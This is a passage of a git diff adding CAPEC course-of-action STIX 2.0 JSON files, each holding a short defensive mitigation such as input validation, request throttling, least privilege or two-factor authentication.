index 0000000000..4cbd56b89f --- /dev/null +++ b/capec/course-of-action/course-of-action--832091a4-e08f-4034-bb49-5c7f60cb32cf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8fabf9df-dbe9-4557-84d4-d6822886dc20", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--832091a4-e08f-4034-bb49-5c7f60cb32cf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-606-1", + "description": "Monitor cellular RF interface to detect the usage of weaker-than-expected cellular encryption.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--847153ab-45d7-433c-877d-91be6e450830.json b/capec/course-of-action/course-of-action--847153ab-45d7-433c-877d-91be6e450830.json new file mode 100644 index 0000000000..0330422faf --- /dev/null +++ b/capec/course-of-action/course-of-action--847153ab-45d7-433c-877d-91be6e450830.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8b19a4c9-e11e-4677-9fa0-d6b5d825bfac", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--847153ab-45d7-433c-877d-91be6e450830", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-84-1", + "description": "Implementation: Run xml parsing and query infrastructure with minimal privileges so that an attacker is limited in their ability to probe other system resources from XQL.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--85441b75-53ba-49bb-b7f9-538a9a5c48c3.json b/capec/course-of-action/course-of-action--85441b75-53ba-49bb-b7f9-538a9a5c48c3.json new file mode 100644 index 0000000000..f8e2591038 --- /dev/null +++ b/capec/course-of-action/course-of-action--85441b75-53ba-49bb-b7f9-538a9a5c48c3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8e3eeb3f-eeb5-4b67-b51b-c169669e3eb3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--85441b75-53ba-49bb-b7f9-538a9a5c48c3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-42-2", + "description": "Use the sendmail restricted shell program (smrsh)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--859d96fc-2041-40a9-ad0d-abfeeda1de40.json b/capec/course-of-action/course-of-action--859d96fc-2041-40a9-ad0d-abfeeda1de40.json new file mode 100644 index 0000000000..81ecd6e6dd --- /dev/null +++ b/capec/course-of-action/course-of-action--859d96fc-2041-40a9-ad0d-abfeeda1de40.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4d76e83c-765d-48a8-ab18-aec8c7fc493f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--859d96fc-2041-40a9-ad0d-abfeeda1de40", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-125-2", + "description": "Uniformly throttle all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--860deb05-098f-491a-b16a-b8e57469c59d.json b/capec/course-of-action/course-of-action--860deb05-098f-491a-b16a-b8e57469c59d.json new file mode 100644 index 0000000000..1df1d5a9b3 --- /dev/null +++ b/capec/course-of-action/course-of-action--860deb05-098f-491a-b16a-b8e57469c59d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f72fbca0-6f0c-43a6-ac84-d608616b1ca0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--860deb05-098f-491a-b16a-b8e57469c59d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-136-0", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--86f13639-9d3a-45a9-9a18-0771b109ae6d.json b/capec/course-of-action/course-of-action--86f13639-9d3a-45a9-9a18-0771b109ae6d.json new file mode 100644 index 0000000000..bab542de50 --- /dev/null +++ b/capec/course-of-action/course-of-action--86f13639-9d3a-45a9-9a18-0771b109ae6d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3f1aa8b0-22f9-43d6-b56e-f2047554d3f8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--86f13639-9d3a-45a9-9a18-0771b109ae6d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-169-5", + "description": "Avoid including information that has the potential to identify and compromise your organization's security such as access to business plans, formulas, and proprietary documents.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--875b6de8-e5e7-4952-9130-4fe457a29e60.json b/capec/course-of-action/course-of-action--875b6de8-e5e7-4952-9130-4fe457a29e60.json new file mode 100644 index 0000000000..5736355eac --- /dev/null +++ b/capec/course-of-action/course-of-action--875b6de8-e5e7-4952-9130-4fe457a29e60.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8c78f8bf-861d-45bc-a617-e7434f849fc8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--875b6de8-e5e7-4952-9130-4fe457a29e60", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-0", + "description": "Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8765b029-9621-452e-9a68-6ea740a42ece.json b/capec/course-of-action/course-of-action--8765b029-9621-452e-9a68-6ea740a42ece.json new file mode 100644 index 0000000000..848204cd00 --- /dev/null +++ b/capec/course-of-action/course-of-action--8765b029-9621-452e-9a68-6ea740a42ece.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--468ecb11-7a4b-42c2-a5cb-b93afa7369db", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8765b029-9621-452e-9a68-6ea740a42ece", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-120-4", + "description": "Refer to the RFCs to safely decode URL.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--882b19e3-3b15-46be-addd-876476f8e56d.json b/capec/course-of-action/course-of-action--882b19e3-3b15-46be-addd-876476f8e56d.json new file mode 100644 index 0000000000..5d3d8a855b --- /dev/null +++ b/capec/course-of-action/course-of-action--882b19e3-3b15-46be-addd-876476f8e56d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e629109d-c672-4ac3-8c90-fa4ef30772c0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--882b19e3-3b15-46be-addd-876476f8e56d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-73-5", + "description": "Implementation: Scan dynamically generated content against validation specification", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8882bec0-0998-407d-b36f-b7a596e4e3ac.json b/capec/course-of-action/course-of-action--8882bec0-0998-407d-b36f-b7a596e4e3ac.json new file mode 100644 index 0000000000..d3be057249 --- /dev/null +++ b/capec/course-of-action/course-of-action--8882bec0-0998-407d-b36f-b7a596e4e3ac.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3435b38b-0cec-410f-a33d-1581cfec4fa7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8882bec0-0998-407d-b36f-b7a596e4e3ac", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-49-1", + "description": "Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8903cc8e-8523-4ecc-898f-e840944d8343.json b/capec/course-of-action/course-of-action--8903cc8e-8523-4ecc-898f-e840944d8343.json new file mode 100644 index 0000000000..926df19a7b --- /dev/null +++ b/capec/course-of-action/course-of-action--8903cc8e-8523-4ecc-898f-e840944d8343.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--aaf15ae1-4b71-4a8d-9119-89d005087f8d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8903cc8e-8523-4ecc-898f-e840944d8343", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-154-0", + "description": "Monitor network activity to detect any anomalous or unauthorized communication exchanges.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8927df5b-bfaa-4da1-af31-ce2704a8158d.json b/capec/course-of-action/course-of-action--8927df5b-bfaa-4da1-af31-ce2704a8158d.json new file mode 100644 index 0000000000..8fca28bc10 --- /dev/null +++ b/capec/course-of-action/course-of-action--8927df5b-bfaa-4da1-af31-ce2704a8158d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4f66273a-810e-4dbb-be67-f46ce103952f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8927df5b-bfaa-4da1-af31-ce2704a8158d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-197-0", + "description": "Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8963b9b0-eb57-4450-ade8-dd7d42426c32.json b/capec/course-of-action/course-of-action--8963b9b0-eb57-4450-ade8-dd7d42426c32.json new file mode 100644 index 0000000000..4bf2629c80 --- /dev/null +++ b/capec/course-of-action/course-of-action--8963b9b0-eb57-4450-ade8-dd7d42426c32.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e6cf2755-3af9-4704-a5b8-38f7e60f80da", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8963b9b0-eb57-4450-ade8-dd7d42426c32", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-33-1", + "description": "Employing an application firewall can help. However, there are instances of the firewalls being susceptible to HTTP Request Smuggling as well.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8981135f-0874-4377-91a7-60102c6c6d08.json b/capec/course-of-action/course-of-action--8981135f-0874-4377-91a7-60102c6c6d08.json new file mode 100644 index 0000000000..cac3f7aadf --- /dev/null +++ b/capec/course-of-action/course-of-action--8981135f-0874-4377-91a7-60102c6c6d08.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--809a7500-c87d-4633-a2fd-aa7c37a9eda2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8981135f-0874-4377-91a7-60102c6c6d08", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-116-1", + "description": "Remove potentially sensitive information that is not necessary for the application's functionality.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8afa62f1-9290-43b7-b133-9f3d1936db73.json b/capec/course-of-action/course-of-action--8afa62f1-9290-43b7-b133-9f3d1936db73.json new file mode 100644 index 0000000000..242905b830 --- /dev/null +++ b/capec/course-of-action/course-of-action--8afa62f1-9290-43b7-b133-9f3d1936db73.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ffa50988-d904-4712-bdf2-ff0a5a2f8848", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8afa62f1-9290-43b7-b133-9f3d1936db73", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-7-0", + "description": "Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8bfe4f1a-bebf-4ed7-9bff-2316e1882b77.json b/capec/course-of-action/course-of-action--8bfe4f1a-bebf-4ed7-9bff-2316e1882b77.json new file mode 100644 index 0000000000..f955888f1b --- /dev/null +++ b/capec/course-of-action/course-of-action--8bfe4f1a-bebf-4ed7-9bff-2316e1882b77.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--be4f7541-cba5-4420-890d-bdd46acbe4d1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8bfe4f1a-bebf-4ed7-9bff-2316e1882b77", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-248-2", + "description": "Input should be parameterized, or restricted to data sections of a command, thus removing the chance that the input will be treated as part of the command itself.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8c55bb21-fa6d-4bdf-9dbd-81e34afc0728.json b/capec/course-of-action/course-of-action--8c55bb21-fa6d-4bdf-9dbd-81e34afc0728.json new file mode 100644 index 0000000000..fbce976957 --- /dev/null +++ b/capec/course-of-action/course-of-action--8c55bb21-fa6d-4bdf-9dbd-81e34afc0728.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7c5641bc-1178-4d73-9048-07afd5b29d06", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8c55bb21-fa6d-4bdf-9dbd-81e34afc0728", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-253-0", + "description": "Minimize attacks by input validation and sanitization of any user data that will be used by the target application to locate a remote file to be included.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8c96de40-cb0e-47f1-832b-52967352e806.json b/capec/course-of-action/course-of-action--8c96de40-cb0e-47f1-832b-52967352e806.json new file mode 100644 index 0000000000..0c6fbeaaf3 --- /dev/null +++ b/capec/course-of-action/course-of-action--8c96de40-cb0e-47f1-832b-52967352e806.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--384e4803-16d1-446a-bf99-585b5c09be1f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8c96de40-cb0e-47f1-832b-52967352e806", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-39-0", + "description": "One solution to this problem is to protect encrypted data with a CRC of some sort. If knowing who last manipulated the data is important, then using a cryptographic \"message authentication code\" (or hMAC) is prescribed. However, this guidance is not a panacea. In particular, any value created by (and therefore encrypted by) the client, which itself is a \"malicious\" value, all the protective cryptography in the world can't make the value 'correct' again. Put simply, if the client has control over the whole process of generating and encoding the value, then simply protecting its integrity doesn't help.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8cdfdea0-d970-4ee5-928d-88dcc8b540fb.json b/capec/course-of-action/course-of-action--8cdfdea0-d970-4ee5-928d-88dcc8b540fb.json new file mode 100644 index 0000000000..426b48112f --- /dev/null +++ b/capec/course-of-action/course-of-action--8cdfdea0-d970-4ee5-928d-88dcc8b540fb.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6c0a7b64-e7cc-4c0c-8907-692f15a79d88", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8cdfdea0-d970-4ee5-928d-88dcc8b540fb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-76-1", + "description": "Design: Ensure all input is validated, and does not contain file system commands", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8d140f53-1195-4d07-a821-5dff65f5021a.json b/capec/course-of-action/course-of-action--8d140f53-1195-4d07-a821-5dff65f5021a.json new file mode 100644 index 0000000000..ea1c3a48fc --- /dev/null +++ b/capec/course-of-action/course-of-action--8d140f53-1195-4d07-a821-5dff65f5021a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9e0be6a8-f774-4f5e-9663-97866b013d0e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8d140f53-1195-4d07-a821-5dff65f5021a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-469-0", + "description": "\n Configuration: Configure web server software to limit the waiting period on opened HTTP sessions\n Design: Use load balancing mechanisms\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8d86079c-91d7-4810-81a1-5de9fa958dbf.json b/capec/course-of-action/course-of-action--8d86079c-91d7-4810-81a1-5de9fa958dbf.json new file mode 100644 index 0000000000..9043bc9800 --- /dev/null +++ b/capec/course-of-action/course-of-action--8d86079c-91d7-4810-81a1-5de9fa958dbf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--43b2f64a-2caf-4202-9160-bae396a1f844", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8d86079c-91d7-4810-81a1-5de9fa958dbf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-301-0", + "description": "Employ a robust network defense posture that includes an IDS/IPS system.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8dfa992d-4cf0-49b0-9e30-75e0aa0371fa.json b/capec/course-of-action/course-of-action--8dfa992d-4cf0-49b0-9e30-75e0aa0371fa.json new file mode 100644 index 0000000000..6056038fd3 --- /dev/null +++ b/capec/course-of-action/course-of-action--8dfa992d-4cf0-49b0-9e30-75e0aa0371fa.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5d17871f-83f8-4951-badb-540b7c5b04cd", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8dfa992d-4cf0-49b0-9e30-75e0aa0371fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-278-1", + "description": "Design: Ensure that function calls that should not be called by an unprivileged user are not accessible to them.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8f12dfb6-e5d2-493f-80c8-de6d843475b6.json b/capec/course-of-action/course-of-action--8f12dfb6-e5d2-493f-80c8-de6d843475b6.json new file mode 100644 index 0000000000..c08bae351c --- /dev/null +++ b/capec/course-of-action/course-of-action--8f12dfb6-e5d2-493f-80c8-de6d843475b6.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f5d82da1-f6ac-48cd-9488-1fc7d2c49e54", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8f12dfb6-e5d2-493f-80c8-de6d843475b6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-267-0", + "description": "Assume all input might use an improper representation. Use canonicalized data inside the application; all data must be converted into the representation used inside the application (UTF-8, UTF-16, etc.)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--8fba3d61-e6ad-4c00-8670-50ffb8714714.json b/capec/course-of-action/course-of-action--8fba3d61-e6ad-4c00-8670-50ffb8714714.json new file mode 100644 index 0000000000..1919f9f599 --- /dev/null +++ b/capec/course-of-action/course-of-action--8fba3d61-e6ad-4c00-8670-50ffb8714714.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--239029b7-ca34-4729-a7d7-d5b347fadc96", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--8fba3d61-e6ad-4c00-8670-50ffb8714714", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-621-0", + "description": "Distort packet sizes and timing at VPN layer by adding padding to normalize packet sizes and timing delays to reduce information leakage via timing.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9019abc7-8715-4102-9d16-de27541d1372.json b/capec/course-of-action/course-of-action--9019abc7-8715-4102-9d16-de27541d1372.json new file mode 100644 index 0000000000..b8379c710d --- /dev/null +++ b/capec/course-of-action/course-of-action--9019abc7-8715-4102-9d16-de27541d1372.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3938fc54-7548-4a62-9eee-1b103ea449e9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9019abc7-8715-4102-9d16-de27541d1372", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-278-0", + "description": "Design: Range, size and value and consistency verification for any arguments supplied to applications and services from external sources and devise appropriate error response.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9096203e-c235-4aad-a35e-ee0728293df7.json b/capec/course-of-action/course-of-action--9096203e-c235-4aad-a35e-ee0728293df7.json new file mode 100644 index 0000000000..662beaa75a --- /dev/null +++ b/capec/course-of-action/course-of-action--9096203e-c235-4aad-a35e-ee0728293df7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--bdf89205-8fee-497a-b886-c3a9595a9cb6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9096203e-c235-4aad-a35e-ee0728293df7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-298-0", + "description": "Configure your firewall to block egress ICMP messages.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--910ff626-f0db-4d42-9310-318119856ee6.json b/capec/course-of-action/course-of-action--910ff626-f0db-4d42-9310-318119856ee6.json new file mode 100644 index 0000000000..1408592ed3 --- /dev/null +++ b/capec/course-of-action/course-of-action--910ff626-f0db-4d42-9310-318119856ee6.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5f2abf3b-7df5-4550-98b5-ad74e5520757", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--910ff626-f0db-4d42-9310-318119856ee6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-123-0", + "description": "To help protect an application from buffer manipulation attacks, a number of potential mitigations can be leveraged. Before starting the development of the application, consider using a code language (e.g., Java) or compiler that limits the ability of developers to act beyond the bounds of a buffer. If the chosen language is susceptible to buffer related issues (e.g., C) then consider using secure functions instead of those vulnerable to buffer manipulations. If a potentially dangerous function must be used, make sure that proper boundary checking is performed. Additionally, there are often a number of compiler-based mechanisms (e.g., StackGuard, ProPolice and the Microsoft Visual Studio /GS flag) that can help identify and protect against potential buffer issues. Finally, there may be operating system level preventative functionality that can be applied.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--91237e5f-d950-4f1d-8d7b-69014cc9cb04.json b/capec/course-of-action/course-of-action--91237e5f-d950-4f1d-8d7b-69014cc9cb04.json new file mode 100644 index 0000000000..0ea5197c32 --- /dev/null +++ b/capec/course-of-action/course-of-action--91237e5f-d950-4f1d-8d7b-69014cc9cb04.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--178094ec-d4dc-4ded-bd21-cfeb3ca99f90", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--91237e5f-d950-4f1d-8d7b-69014cc9cb04", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-3", + "description": "Design: Utilize two factor authentication to increase authentication assurance.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--912509db-7d6a-4695-9793-2a80b06ec40c.json b/capec/course-of-action/course-of-action--912509db-7d6a-4695-9793-2a80b06ec40c.json new file mode 100644 index 0000000000..96aab45ff1 --- /dev/null +++ b/capec/course-of-action/course-of-action--912509db-7d6a-4695-9793-2a80b06ec40c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f30a0ba1-26f7-454f-889f-47f6dd371861", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--912509db-7d6a-4695-9793-2a80b06ec40c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-203-0", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9238edb8-e9ca-4670-8952-b3cce2207b6d.json 